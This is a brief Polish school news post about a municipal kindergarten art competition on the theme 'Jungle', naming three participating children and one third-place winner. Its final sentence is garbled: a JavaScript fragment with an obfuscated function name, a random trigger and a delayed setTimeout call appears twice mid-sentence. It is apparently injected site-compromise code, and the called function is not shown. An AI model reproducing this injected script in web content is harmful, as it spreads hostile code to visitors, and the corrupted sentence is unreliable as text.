V Gminny Konkurs Plastyczny „Świat wokół nas…”

W dniu 18 maja odbył się V Gminny Konkurs Plastyczny pod hasłem „Świat wokół nas…” zorganizowany przez Przedszkole Publiczne w Studzieńcu. Nasz oddział przedszkolny reprezentowali Ksawery Ostrowski, Ewelina Olszewska i Lena Stefańska.

Celem konkursu było inspirowanie zainteresowań plastycznych, promocja uzdolnionych twórców, czerpanie radości z procesu tworzenia oraz integrowanie dzieci z różnych placówek.

Tegoroczny temat wykonywanych prac brzmiał „Dżungla”. W skład komisji konkursowej weszli wszyscy opiekunowie dzieci a oceniając wykonane prace plastyczne brali pod uwagę zgodność pracy plastycznej z tematem, walory artystyczne, pomysłowość i estetykę.

Nasza uczennica Ewelina Olszewskadom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);} zajęła III miejscedom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}. Gratulujemy!!!